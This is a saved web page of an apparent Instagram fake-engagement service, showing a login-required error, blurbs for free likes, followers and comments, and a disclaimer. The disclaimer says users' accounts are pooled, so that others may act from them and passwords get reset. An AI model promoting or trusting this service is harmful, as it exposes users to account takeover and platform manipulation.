<html lang="en" class=" " style="height: 100%;"><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
      <title>You must be logged in to view this page!! | Get Free Instagram Likes</title>
            	
    <link href="https://fonts.googleapis.com/css?family=Montserrat:200,300,400,500,600,700,800,900&amp;display=swap" rel="stylesheet">
    <link rel="stylesheet" href="/assets/css/bootstrap.min.css">
    <link rel="stylesheet" href="/assets/plugins/fontawesome/css/all.min.css">
    <link rel="stylesheet" href="/assets/css/style.css">
    
        <link rel="stylesheet" href="/assets/bootstrap/css/bootstrap-paper.min.css">
    <link type="text/css" rel="stylesheet" href="/assets/lightgallery/dist/css/lightgallery.min.css">
    <link rel="stylesheet" href="/assets/scripts/fancybox/source/jquery.fancybox.css?v=2.1.5" type="text/css" media="screen">
    <link rel="stylesheet" href="/assets/style/font-awesome.min.css" type="text/css" media="screen">
    <link rel="stylesheet" href="/assets/style/paper.css?v=v3.1.0">
        <link rel="stylesheet" href="/assets/nprogress/nprogress.css">
    
    
    <link href="/assets/css/style.bundle.css" rel="stylesheet" type="text/css">
	
	
     

<script type="text/javascript" async="" src="https://www.google-analytics.com/analytics.js"></script><script async="" src="//widgets.getsitecontrol.com/193884/script.js"></script><script async="" src="https://www.google-analytics.com/analytics.js"></script><script async="" src="https://www.googletagmanager.com/gtag/js?id=UA-120798546-4"></script><script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-120798546-4');
</script><link type="text/css" rel="stylesheet" charset="UTF-8" href="https://translate.googleapis.com/translate_static/css/translateelement.css"><script type="text/javascript" charset="UTF-8" src="https://translate.googleapis.com/translate_static/js/element/main.js"></script><style type="text/css">.fancybox-margin{margin-right:17px;}</style><script type="text/javascript" charset="UTF-8" src="https://translate.googleapis.com/element/TE_20210503_00/e/js/element/element_main.js"></script></head>

  
<!-- Global site tag (gtag.js) - Google Analytics -->





<body class="pace-done" style="position: relative; min-height: 100%; top: 0px; cursor: auto;"><div class="pace  pace-inactive"><div class="pace-progress" data-progress-text="100%" data-progress="99" style="transform: translate3d(100%, 0px, 0px);">
  <div class="pace-progress-inner"></div>
</div>
<div class="pace-activity"></div></div>
    <header class="head">
        <div class="header-top s-container">
		
            <div class="float-left logo">
			 <a class="navbar-brand" href="/"><img alt="igfollower.net" src="https://igfollower.net/assets/images/logo.png"></a>
			<br>
			<br>
			
						<style="text-align: center;"=""><select class="btn btn-success" onchange="doGTranslate(this);" style="border-radius:20px;"><option value="">Select Language</option><option value="en|tr">Turkish</option><option value="en|af">Afrikaans</option><option value="en|sq">Albanian</option><option value="en|ar">Arabic</option><option value="en|hy">Armenian</option><option value="en|az">Azerbaijani</option><option value="en|eu">Basque</option><option value="en|be">Belarusian</option><option value="en|bg">Bulgarian</option><option value="en|ca">Catalan</option><option value="en|zh-CN">Chinese (Simplified)</option><option value="en|zh-TW">Chinese (Traditional)</option><option value="en|hr">Croatian</option><option value="en|cs">Czech</option><option value="en|da">Danish</option><option value="en|nl">Dutch</option><option value="en|en">English</option><option value="en|et">Estonian</option><option value="en|tl">Filipino</option><option value="en|fi">Finnish</option><option value="en|fr">French</option><option value="en|gl">Galician</option><option value="en|ka">Georgian</option><option value="en|de">German</option><option value="en|el">Greek</option><option value="en|ht">Haitian Creole</option><option value="en|iw">Hebrew</option><option value="en|hi">Hindi</option><option value="en|hu">Hungarian</option><option value="en|is">Icelandic</option><option value="en|id">Indonesian</option><option value="en|ga">Irish</option><option value="en|it">Italian</option><option value="en|ja">Japanese</option><option value="en|ko">Korean</option><option value="en|lv">Latvian</option><option value="en|lt">Lithuanian</option><option value="en|mk">Macedonian</option><option value="en|ms">Malay</option><option value="en|mt">Maltese</option><option value="en|no">Norwegian</option><option value="en|fa">Persian</option><option value="en|pl">Polish</option><option value="en|pt">Portuguese</option><option value="en|ro">Romanian</option><option value="en|ru">Russian</option><option value="en|sr">Serbian</option><option value="en|sk">Slovak</option><option value="en|sl">Slovenian</option><option value="en|es">Spanish</option><option value="en|sw">Swahili</option><option value="en|sv">Swedish</option><option value="en|th">Thai</option><option value="en|uk">Ukrainian</option><option value="en|ur">Urdu</option><option value="en|vi">Vietnamese</option><option value="en|cy">Welsh</option><option value="en|yi">Yiddish</option><option value="en|bn">Bengali</option><option value="en|bs">Bosnian</option><option value="en|ceb">Cebuano</option><option value="en|eo">Esperanto</option><option value="en|gu">Gujarati</option><option value="en|ha">Hausa</option><option value="en|hmn">Hmong</option><option value="en|ig">Igbo</option><option value="en|jw">Javanese</option><option value="en|kn">Kannada</option><option value="en|km">Khmer</option><option value="en|lo">Lao</option><option value="en|la">Latin</option><option value="en|mi">Maori</option><option value="en|mr">Marathi</option><option value="en|mn">Mongolian</option><option value="en|ne">Nepali</option><option value="en|pa">Punjabi</option><option value="en|so">Somali</option><option value="en|ta">Tamil</option><option value="en|te">Telugu</option><option value="en|yo">Yoruba</option><option value="en|zu">Zulu</option> </select>

         
            </style="text-align:></div>
			
            <div class="float-right top-menu" id="menu">
                <ul>
				 
				 				  <li><a href="https://igfollower.net/tools/send-follower">ANA SAYFA</a></li>
                    <li><a href="/blog">BLOG</a></li>
                    <li><a href="/">My Profile</a></li>
                     <li><a href="https://igfollower.net/girisyap">Login</a></li>
					 
					                     </ul>
                <button class="close-menu show-mobile"><i class="fas fa-times"></i></button>
            </div>
            <div class="float-right show-mobile">
                <button class="open-menu"><i class="fas fa-bars"></i></button>
            </div>
            <div class="clear"></div>
            <div class="float-right services-buttons">
                	                        <a href="https://igfollower.net/girisyap" class="b2 color1"><i class="far fa-heart"></i>  Send Like <span> *</span></a>
                <a href="https://igfollower.net/girisyap" class="b2 color2"><i class="fas fa-users"></i> Send Follow  <span>*</span></a>
                <a href="https://igfollower.net/girisyap" class="b2 color3"><i class="fab fa-instagram"></i>Send Story View  <span>*</span></a>
                <a href="https://igfollower.net/girisyap" class="b2 color4"><i class="far fa-play-circle"></i> Send Video Views <span>*</span></a>
                
                   
                   

                
                             </div>
            <div class="clear"></div>
        </div>
        <div class="header-clear"></div>
    </header>

         <section class="order-form">
   
        <div class="s-container">     





							
<div class="container">
    <h2>Page Cannot Be Displayed!</h2>
    <p class="text-danger">You must be logged in to view this page!</p>
</div></div>
</section>

 <section class="services">
        <div class="s-container">
            <div class="row">
                <div class="col-md-4">
                    <div class="item">
                        <div class="icon">
                            <img src="assets/images/icons/followers.png" alt="">
                        </div>
                        <div class="content">
                            <h3>Instagram <strong>Followers Trick</strong></h3>
                            <p>You can increase your instagram followers by using our Instagram follower cheat tool.
                                And it's free. It is very popular to be more popular on Instagram by increasing your followers.
                                </p>
                        </div>
                        <div class="clear"></div>
                    </div>
                </div>
                <div class="col-md-4">
                    <div class="item">
                        <div class="icon">
                            <img src="assets/images/icons/like.png" alt="">
                        </div>
                        <div class="content">
                            <h3>Instagram <strong>Likes Trick</strong></h3>
                            <p>You can upload likes to the posts you share with the Instagram win trick.
                                Our Instagram like cheat tool is free. Your favorite posts on instagram
                                get out in the discover section and reach more people.</p>
                        </div>
                        <div class="clear"></div>
                    </div>
                </div>
                <div class="col-md-4">
                    <div class="item">
                        <div class="icon">
                            <img src="assets/images/icons/roulette.png" alt="">
                        </div>
                        <div class="content">
                            <h3>Instagram <strong>Convert Earn</strong></h3>
                            <p>Comment on your photos and videos with Instagram comment posting cheat system
                                You can send. Comments are publicly visible. A great interaction
                                You can take.</p>
                        </div>
                    </div>
                </div>
                <div class="col-md-4">
                    <div class="item">
                        <div class="icon">
                            <img src="assets/images/icons/unfollow.png" alt="">
                        </div>
                        <div class="content">
                            <h3>Instagram <strong>Do Not Unfollow</strong></h3>
                            <p>You can identify the users who do not follow you on Instagram and leave the follow-up. It
                                our service is also free. Just log in. Then in the tools section
                                Click on the instagram nonfollowers link and start using.</p>
                        </div>
                        <div class="clear"></div>
                    </div>
                </div>
                <div class="col-md-4">
                    <div class="item">
                        <div class="icon">
                            <img src="assets/images/icons/instagram.png" alt="">
                        </div>
                        <div class="content">
                            <h3>Instagram <strong>Story Views</strong></h3>
                            <p>You can upload likes to the posts you share with the Instagram win trick.
                                Our Instagram like cheat tool is free. Your favorite posts on instagram
                                get out in the discover section and reach more people.</p>
                        </div>
                        <div class="clear"></div>
                    </div>
                </div>
                <div class="col-md-4">
                    <div class="item">
                        <div class="icon">
                            <img src="assets/images/icons/play-button.png" alt="">
                        </div>
                        <div class="content">
                            <h3>Instagram <strong>Video Views</strong></h3>
                            <p>With the video watching trick, you can send views to the videos in your profile. In this way, you get the chance to win in different followers from the Discover section.
.</p>
                        </div>
                        <div class="clear"></div>
                    </div>
                </div>
            </div>
        </div>
    </section>

  
    <footer class="foot">
        <div class="s-container">
            <div class="float-left logo">
                <a href="#">
                    <img src="assets/images/logo.png" alt="">
                </a>
            </div>
            <div class="float-right menu">
                <a href="#">CONTRACT</a>
                <a href="#">ABOUT</a>
                <a href="#">BLOG</a>
                <a href="#">SERVICES</a>
                <a href="#">CONTACT</a>
            </div>
            <div class="clear"></div>
        </div>
    </footer>
    
<div class="modal fade" id="modalContact" style="z-index: 1051;">
    <div class="modal-dialog">
        <div class="modal-content" id="infoModal">
            <div class="modal-body">
                 <h3>İletişim Bilgileri</h3>
                <p>Kredi satın almak için aşağıda bulunan iletişim kanallarından bize ulaşabilirsiniz.</p>
                                            </div>
        </div>
    </div>
</div>
<div class="modal fade" id="modalSorumluluk" style="z-index: 1051;">
<div class="modal-dialog">
<div class="modal-content" id="modalSorumlulukInner">
<div class="modal-header"><button aria-hidden="true" class="close" data-dismiss="modal" type="button">ÃÂ</button>

<h4 class="modal-title">Get Free Instagram Likes Sorumluluk KurallarÃÂ±</h4>
</div>

<div class="modal-body">
<div class="well">
<p>Every individual is responsible for he or she. In addition to this, the user information that is determined in court and presented to the court will be the responsibility of our party..</p>

<p>We are not responsible for any kind of user name password or e-mail changes. When the User enters the System, he or she is fully responsible, your account is safe with us ..</p>

<p>Spam operations on the web site will be submitted to the court..</p>

<p>Our Web Site works with the User Pool method. Other people may be requesting transactions from your account while you are trading..</p>

<p>As a result of the misconduct and slanders on the web site, the people who made these abuses and slanders will be given to the court..</p>

<p>Instagram passwords are automatically reset. Our website is not responsible for this process..</p>

<p>Turning off your Instagram account is not held responsible for spam or suspension..</p>

<p>Get Free Instagram Likes Any information of users logging in with instagram is deleted every 24 hours so as not to host our site..</p>

<p>No user will be able to access the registration list for past transactions..</p>

<p>Although our site is not responsible for changing user name, password and e-mail, the user will not be able to claim any rights..</p>

<p>Our website will be filed for compensation to persons who are unnecessarily disturbed by court and similar proceedings..</p>

<p>All users who have entered the system are deemed to have read and accepted these items..</p>
</div>
</div>
</div>
</div>
</div>

<script src="/assets/jquery/2.2.4/jquery.min.js"></script>
<script src="/assets/bootstrap/js/bootstrap.min.js"></script>
<script src="/assets/scripts/fancybox/source/jquery.fancybox.pack.js"></script>
<script src="/assets/lightgallery/dist/js/lightgallery.min.js"></script>
<script src="/assets/lightgallery/dist/js/lg-video.min.js"></script>
<script src="/assets/lazyload/jquery.lazyload.min.js"></script>
<script src="/assets/nprogress/nprogress.js"></script>
<script src="/assets/core/core.js?v=3.1.10"></script>
<script type="text/javascript">
        (function(i, s, o, g, r, a, m) {
        i['GoogleAnalyticsObject'] = r;
        i[r] = i[r] || function() {
            (i[r].q = i[r].q || []).push(arguments)
        }, i[r].l = 1 * new Date();
        a = s.createElement(o),
            m = s.getElementsByTagName(o)[0];
        a.async = 1;
        a.src   = g;
        m.parentNode.insertBefore(a, m)
    })(window, document, 'script', 'https://www.google-analytics.com/analytics.js', 'ga');
    ga('create', '', 'auto');
    ga('send', 'pageview');
        initProject();
</script>

    <script src="/assets/js/jquery-3.4.1.min.js"></script>
    <script src="/assets/js/popper.min.js"></script>
    <script src="/assets/js/bootstrap.min.js"></script>
    <script src="/assets/js/main.js"></script>

    <script type="/text/javascript" src="assets/login/js/rr.js"></script>
    <script src="/assets/js2/core.min.js"></script>
    <script src="/assets/js2/app.min.js"></script>
    
	<style type="text/css">
			<!--
			a.gflag {
				vertical-align: middle;
				font-size: 16px;
				padding: 1px 0;
				background-repeat: no-repeat;
				background-image: url(//gtranslate.net/flags/16.png);
			}

			a.gflag img {
				border: 0;
			}

			a.gflag:hover {
				background-image: url(//gtranslate.net/flags/16a.png);
			}

			#goog-gt-tt {
				display: none !important;
			}

			.goog-te-banner-frame {
				display: none !important;
			}

			.goog-te-menu-value:hover {
				text-decoration: none !important;
			}

			body {
				top: 0 !important;
			}

			#google_translate_element2 {
				display: none !important;
			}

			-->
		</style>
		<div id="google_translate_element2"><div class="skiptranslate goog-te-gadget" dir="ltr" style=""><div id=":0.targetLanguage"><select class="goog-te-combo" aria-label="Language Translate Widget"><option value="">Select Language</option><option value="af">Afrikaans</option><option value="sq">Albanian</option><option value="am">Amharic</option><option value="ar">Arabic</option><option value="hy">Armenian</option><option value="az">Azerbaijani</option><option value="eu">Basque</option><option value="be">Belarusian</option><option value="bn">Bengali</option><option value="bs">Bosnian</option><option value="bg">Bulgarian</option><option value="ca">Catalan</option><option value="ceb">Cebuano</option><option value="ny">Chichewa</option><option value="zh-CN">Chinese (Simplified)</option><option value="zh-TW">Chinese (Traditional)</option><option value="co">Corsican</option><option value="hr">Croatian</option><option value="cs">Czech</option><option value="da">Danish</option><option value="nl">Dutch</option><option value="eo">Esperanto</option><option value="et">Estonian</option><option value="tl">Filipino</option><option value="fi">Finnish</option><option value="fr">French</option><option value="fy">Frisian</option><option value="gl">Galician</option><option value="ka">Georgian</option><option value="de">German</option><option value="el">Greek</option><option value="gu">Gujarati</option><option value="ht">Haitian Creole</option><option value="ha">Hausa</option><option value="haw">Hawaiian</option><option value="iw">Hebrew</option><option value="hi">Hindi</option><option value="hmn">Hmong</option><option value="hu">Hungarian</option><option value="is">Icelandic</option><option value="ig">Igbo</option><option value="id">Indonesian</option><option value="ga">Irish</option><option value="it">Italian</option><option value="ja">Japanese</option><option value="jw">Javanese</option><option value="kn">Kannada</option><option value="kk">Kazakh</option><option value="km">Khmer</option><option value="rw">Kinyarwanda</option><option value="ko">Korean</option><option value="ku">Kurdish (Kurmanji)</option><option value="ky">Kyrgyz</option><option value="lo">Lao</option><option value="la">Latin</option><option value="lv">Latvian</option><option value="lt">Lithuanian</option><option value="lb">Luxembourgish</option><option value="mk">Macedonian</option><option value="mg">Malagasy</option><option value="ms">Malay</option><option value="ml">Malayalam</option><option value="mt">Maltese</option><option value="mi">Maori</option><option value="mr">Marathi</option><option value="mn">Mongolian</option><option value="my">Myanmar (Burmese)</option><option value="ne">Nepali</option><option value="no">Norwegian</option><option value="or">Odia (Oriya)</option><option value="ps">Pashto</option><option value="fa">Persian</option><option value="pl">Polish</option><option value="pt">Portuguese</option><option value="pa">Punjabi</option><option value="ro">Romanian</option><option value="ru">Russian</option><option value="sm">Samoan</option><option value="gd">Scots Gaelic</option><option value="sr">Serbian</option><option value="st">Sesotho</option><option value="sn">Shona</option><option value="sd">Sindhi</option><option value="si">Sinhala</option><option value="sk">Slovak</option><option value="sl">Slovenian</option><option value="so">Somali</option><option value="es">Spanish</option><option value="su">Sundanese</option><option value="sw">Swahili</option><option value="sv">Swedish</option><option value="tg">Tajik</option><option value="ta">Tamil</option><option value="tt">Tatar</option><option value="te">Telugu</option><option value="th">Thai</option><option value="tr">Turkish</option><option value="tk">Turkmen</option><option value="uk">Ukrainian</option><option value="ur">Urdu</option><option value="ug">Uyghur</option><option value="uz">Uzbek</option><option value="vi">Vietnamese</option><option value="cy">Welsh</option><option value="xh">Xhosa</option><option value="yi">Yiddish</option><option value="yo">Yoruba</option><option value="zu">Zulu</option></select></div>Powered by <span style="white-space:nowrap"><a class="goog-logo-link" href="https://translate.google.com" target="_blank"><img src="https://www.gstatic.com/images/branding/googlelogo/1x/googlelogo_color_42x16dp.png" width="37px" height="14px" style="padding-right: 3px" alt="Google Translate">Translate</a></span></div></div>
		<script type="text/javascript">
			function googleTranslateElementInit2() {
				new google.translate.TranslateElement({
					pageLanguage: 'en',
					autoDisplay: false
				}, 'google_translate_element2');
			}
		</script>
		<script type="text/javascript" src="https://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit2"></script>

		<script type="text/javascript">
		
		
			/* <![CDATA[ */
			eval(function (p, a, c, k, e, r) {
				e = function (c) {
					return (c < a ? '' : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
				};
				if (!''.replace(/^/, String)) {
					while (c--) r[e(c)] = k[c] || e(c);
					k = [function (e) {
						return r[e]
					}];
					e = function () {
						return '\\w+'
					};
					c = 1
				}
				;
				while (c--) if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
				return p
			}('6 7(a,b){n{4(2.9){3 c=2.9("o");c.p(b,f,f);a.q(c)}g{3 c=2.r();a.s(\'t\'+b,c)}}u(e){}}6 h(a){4(a.8)a=a.8;4(a==\'\')v;3 b=a.w(\'|\')[1];3 c;3 d=2.x(\'y\');z(3 i=0;i<d.5;i++)4(d[i].A==\'B-C-D\')c=d[i];4(2.j(\'k\')==E||2.j(\'k\').l.5==0||c.5==0||c.l.5==0){F(6(){h(a)},G)}g{c.8=b;7(c,\'m\');7(c,\'m\')}}', 43, 43, '||document|var|if|length|function|GTranslateFireEvent|value|createEvent||||||true|else|doGTranslate||getElementById|google_translate_element2|innerHTML|change|try|HTMLEvents|initEvent|dispatchEvent|createEventObject|fireEvent|on|catch|return|split|getElementsByTagName|select|for|className|goog|te|combo|null|setTimeout|500'.split('|'), 0, {}))
			/* ]]> */
		</script>
		
<style>
    /* The Modal (background) */
    .modal {
        display          : none; /* Hidden by default */
        position         : fixed; /* Stay in place */
        z-index          : 999999; /* Sit on top */
        padding-top      : 100px; /* Location of the box */
        left             : 0;
        top              : 0;
        width            : 100%; /* Full width */
        height           : 100%; /* Full height */
        overflow         : auto; /* Enable scroll if needed */
        background-color : rgb(0, 0, 0); /* Fallback color */
        background-color : rgba(0, 0, 0, 0.4); /* Black w/ opacity */
    }

    /* Modal Content */
    .modal-content {
        background-color : #fefefe;
        margin           : auto;
        padding          : 20px;
        border           : 1px solid #888;
        width            : 80%;
    }

    /* The Close Button */
    .close {
        color       : #aaaaaa;
        float       : right;
        font-size   : 28px;
        font-weight : bold;
    }

    .close:hover,
    .close:focus {
        color           : #000;
        text-decoration : none;
        cursor          : pointer;
    }
</style>



<!--@parentViewContentForsection_scripts--><script>
    // // Get the modal
    // var modal = document.getElementById('myModal');
    //
    // // Get the <span> element that closes the modal
    // var span = document.getElementsByClassName("close")[0];
    //
    // // When the user clicks on <span> (x), close the modal
    // span.onclick = function() {
    //     modal.style.display = "none";
    // }
    //
    // // When the user clicks anywhere outside of the modal, close it
    // window.onclick = function(event) {
    //     if(event.target == modal) {
    //         modal.style.display = "none";
    //     }
    // }
    //
    // document.addEventListener('DOMContentLoaded', function() {
    //     modal.style.display = "block";
    // }, false);
</script>
<script>
  (function (w,i,d,g,e,t,s) {w[d] = w[d]||[];t= i.createElement(g);
    t.async=1;t.src=e;s=i.getElementsByTagName(g)[0];s.parentNode.insertBefore(t, s);
  })(window, document, '_gscq','script','//widgets.getsitecontrol.com/193884/script.js');
</script><div id="goog-gt-tt" class="skiptranslate" dir="ltr"><div style="padding: 8px;"><div><div class="logo"><img src="https://www.gstatic.com/images/branding/product/1x/translate_24dp.png" width="20" height="20" alt="Google Translate"></div></div></div><div class="top" style="padding: 8px; float: left; width: 100%;"><h1 class="title gray">Original text</h1></div><div class="middle" style="padding: 8px;"><div class="original-text"></div></div><div class="bottom" style="padding: 8px;"><div class="activity-links"><span class="activity-link">Contribute a better translation</span><span class="activity-link"></span></div><div class="started-activity-container"><hr style="color: #CCC; background-color: #CCC; height: 1px; border: none;"><div class="activity-root"></div></div></div><div class="status-message" style="display: none;"></div></div>


<div class="goog-te-spinner-pos"><div class="goog-te-spinner-animation"><svg xmlns="http://www.w3.org/2000/svg" class="goog-te-spinner" width="96px" height="96px" viewBox="0 0 66 66"><circle class="goog-te-spinner-path" fill="none" stroke-width="6" stroke-linecap="round" cx="33" cy="33" r="30"></circle></svg></div></div></body><div id="vidcor-container"><link rel="stylesheet" href="chrome-extension://hfadalcgppcbffdnichplalnmhjbabbm/css/cadcom.css" type="text/css">
<link rel="stylesheet" href="chrome-extension://hfadalcgppcbffdnichplalnmhjbabbm/css/style.css" type="text/css">
<link href="https://fonts.googleapis.com/css?family=Lato&amp;display=swap" rel="stylesheet">

<!--Action frame start--->
<div id="cc-recording-web" class="recording-option-popup-container">
	<!-- <iframe src="about:blank" style="visibility:hidden;" allowtransparency="true" application="yes" allow="microphone;camera;speaker;" id="cc-recording-web"
            frameBorder="0" style=""></iframe> -->
</div>
<!---End-->


<!--Toster for message show dynamic--->
<div id="fde-add-brading-logo">
</div>
<!---End-->

<!--Toster for message show dynamic--->
<div id="fde-add-toster-web">
</div>
<!---End-->

<!--Gmail frame add Start-->
<div id="cc-video-search" style="z-index: 1000000004;display: none;position: fixed;top:0;width: 100vw;height: 100vh;background: rgba(0,0,0, 0.5);">
</div>
<!--End-->
<!--2f Login frame add Start-->
<div id="fde-2flogin-frame" style="z-index: 1000000003;position: fixed;top: 5%;left:30%;">

</div>
<!--End-->
<!--Video frame start--->
<div id="cc-recording-block" style="display: none;z-index: 1000000002;bottom: 20px; left: 100px;">
	<div class="cc-personal-recorder-view show" id="vcc-ffcam-container">
		<table>
			<tbody><tr>
				<td id="vcc-left-position"></td>
				<td>
					<!--<div class="timer_count" id="vcc-timer-elem"></div>-->
					<!-- <div class="timer_count" id="vcc-timer-elem" style="display: none;"></div> -->
					<div class="cc-ffcam-view-wrap cc-round-shadow" style="display: inline-block;">
						<div class="cc-ffcam-view size-1 cc-round" id="vcc-video-frame">
							<div class="cc-ffcam-iframe-container" id="vidcor-video-frame">
								<div class="fl-loader-bg" id="fde-video-loader" style="opacity: 0;">
									<div class="fl-loading-bar-spinner fl-spinner sml">
										<div class="fl-spinner-icon sml"></div>
									</div>
								</div>
								<!-- <img id="vidcor-ff-img" style="width:100%;	object-fit:cover; height:100%;"
									onerror="this.onerror=null;this.src='chrome-extension://hfadalcgppcbffdnichplalnmhjbabbm/images/user.jpeg';" /> -->
								<div id="vidcor-ff-img" style="width:100%;	object-fit:cover; height:100%; display: none;">
									<div style="text-align: center;padding-top: 40px;font-weight: bold;font-family: 'Circular-Loom';">Close other apps</div>
									<div style="padding-top: 25px;font-size: 13px;text-align: center;font-family: 'Circular-Loom';">
										It looks like some other app is <br> already using your camera.
									</div>
									<div style="text-align: center;pointer-events: all;padding-top: 10px;">
										<button id="retryVideoFrmae" style="cursor: pointer;background-color: #1e51c39c;color: #fff;border: black;border-radius: 10px;width: 70px;height: 25px;">Retry</button>
									</div>
								</div>
								<iframe src="chrome-extension://hfadalcgppcbffdnichplalnmhjbabbm/template/iframe.html" id="vidcor-ff-cam" class="cc-zoom1" allow="camera;microphone"></iframe>
							</div>



							<div class="cc-camera-type-blk" style="display: none;">
								<div class="cc-camera-type">
									<div class="c-shape-sqr cc-tt" id="fde-square-click">
										<span class="cc-tt-hint">Click to change the shape<br>to square</span>
									</div>
									<div class="c-shape-cir cc-tt act" id="fde-rount-click">
										<span class="cc-tt-hint">Click to change the shape<br>to circle</span>
									</div>
								</div>
								<div class="shape-size">
									<div class="size-button size-3 vcc-cam-zoom3"></div>
									<div class="size-button size-2 vcc-cam-zoom2"></div>
									<div class="size-button size-1 vcc-cam-zoom1 active"></div>
								</div>
							</div>



							<!-- <div class="cc-camera-size-tooltip">
								<div class="size-button size-1 vcc-cam-zoom1 active"></div>
								<div class="size-button size-2 vcc-cam-zoom2"></div>
								<div class="size-button size-3 vcc-cam-zoom3"></div>
							</div> -->

							<!-- <span class="cc-ffcam-close size-1"></span> -->
							<div class="cc-tt">
								<span class="cc-flipcamera" id="vcc-flip-camera"></span>
								<span class="cc-tt-hint hint-camera" style="height:14px!important;">Mirror Camera</span>
							</div>
							<!-- <span class="cc-bg-setting" id="fde-bg-blur-click"></span> -->
						</div>
					</div>
				</td>
			</tr>
		</tbody></table>
	</div>
</div>
<!------------Tools Start---------------->
<section class="cc-tools-container" valign="bottom" id="fde-action-menu-items" style="display: none;top: 144px; left: 0px;">
	<div style="position: relative;bottom: 0px; left:-10px; top:10px; display: flex;">
		<img id="drag-elem-id" class="cc-drag" src="chrome-extension://hfadalcgppcbffdnichplalnmhjbabbm/images/icons/drag.png">
		<div class="cc-tools">
			<div>
				<strong class="recording-duration" id="vcc-timer-elem" style="display: none;">0:00:00</strong>
			</div>
			<img src="chrome-extension://hfadalcgppcbffdnichplalnmhjbabbm/images/icons/flu-pause-ico.png" id="vcc-pause-btn" style="display: none;" title="Pause Recording">
			<img src="chrome-extension://hfadalcgppcbffdnichplalnmhjbabbm/images/icons/flu-play-ico.png" id="vcc-resume-btn" style="display: none;" title="Resume Recording">
			<img src="chrome-extension://hfadalcgppcbffdnichplalnmhjbabbm/images/icons/flu-play-ico.png" id="vcc-init-btn" title="Start Recording" style="display: none;">
			<span class="pos-rel" style="height:36px;">
			<img src="chrome-extension://hfadalcgppcbffdnichplalnmhjbabbm/images/icons/flu-close-ico.png" id="open-cancel-option" title="Cancel Recording">
				<div class="cls-rec" id="cancel-option-list" style="display: none;">
					<ul>
						<li id="vcc-cancel-btn">Cancel recording</li>
						<li id="fde-restart">Restart recording</li>
					</ul>
				</div>
			</span>

			<img src="chrome-extension://hfadalcgppcbffdnichplalnmhjbabbm/images/icons/flu-finish-rc.png" id="vcc-stop-btn" style="display: none;" title="Finish Recording">
			<img src="chrome-extension://hfadalcgppcbffdnichplalnmhjbabbm/images/icons/flu-camera-on-ico.png" id="vcc-cam-setting-btn" title="Camera ON">
			<img src="chrome-extension://hfadalcgppcbffdnichplalnmhjbabbm/images/icons/flu-camera-off-ico.png" id="vcc-cam-hide-setting-btn" title="Camera OFF">
			<div id="vcc-draw-elem" style="display: none;">
				<div id="drawing-tools-open">
					<div class="pentool">Tools</div>
				</div>
				<div id="drawing-tools-list" style="display: none;">
					<img class="extra-tools drawingToolHideShow" id="vcc-draw-pen" src="chrome-extension://hfadalcgppcbffdnichplalnmhjbabbm/images/icons/flu-pen-ico.png" title="Pen Tool">
					<img class="extra-tools drawingToolHideShow" id="vcc-draw-eraser" src="chrome-extension://hfadalcgppcbffdnichplalnmhjbabbm/images/icons/flu-eraser-ico.png" title="Eraser">
					<img class="extra-tools drawingToolHideShow" id="vcc-clear-draw" src="chrome-extension://hfadalcgppcbffdnichplalnmhjbabbm/images/icons/flu-clear-pen.png" title="Clear Paint">
					<img class="extra-tools drawingToolHideShow" id="vcc-cursor-focus" src="chrome-extension://hfadalcgppcbffdnichplalnmhjbabbm/images/icons/flu-focus-ico.png" title="Mouse Pointer Spotlight">
					<img class="extra-tools drawingToolHideShow" id="vcc-draw-highlight" src="chrome-extension://hfadalcgppcbffdnichplalnmhjbabbm/images/icons/flu-mouse.png" title="Mouse Click Highlighter">
				</div>

				<div id="drawing-tools-close" style="display: none;">
					<div class="pentool-cls"></div>
				</div>
			</div>
		</div>
		<div class="cc-tools ccpen-col" id="cc-pen-editor" style="display: none;">
			<div class="brush-tools">
				<div class="pen-color" id="pen-color-id">
					<ul style="padding-left:5px; margin:0">
						<!-- First one is default if changed please change it in ElectronConstant as well. -->
						<li data-color="#7fffd4" title="Aqua Menthe"></li>
						<li data-color="#8a2be2" title="Proton Purple"></li>
						<li data-color="#ff4500" title="Orange Red"></li>
						<li data-color="#008000" title="Office Green"></li>
						<li data-color="#0000ff" title="Just Blue"></li>
						<li data-color="#ffc0cb" title="Blush Pink"></li>
						<li data-color="#dfff00" title="Chartreuse Yellow"></li>
						<li data-color="#fff9e3" title="Cosmic Latte"></li>
						<li data-color="#000" title="All Black"></li>
						<li data-color="#fff" title="Simple White"></li>
					</ul>
				</div>
				<div class="brush-size-wrapper">
					<span id="pen-size-text" class="cc-pensize">5px</span>
					<div class="brush-size">
						<input id="pen-size" type="range" orient="vertical" min="5" max="20" value="5">
					</div>
					<div id="current-pen-size" class="pen-size"></div>
				</div>
			</div>
			<div class="cc-close" id="cc-editor-close">close</div>
		</div>
	</div>
</section>
<!------------Tools Ends----------------->

<!--End-->

<!--Message popup --->
<div id="fde-popup-message"></div>
<div id="fde-common-popup-message"></div>
<!---End-->

<!-- ---------------------------------------------------------------------------------- --></div></html>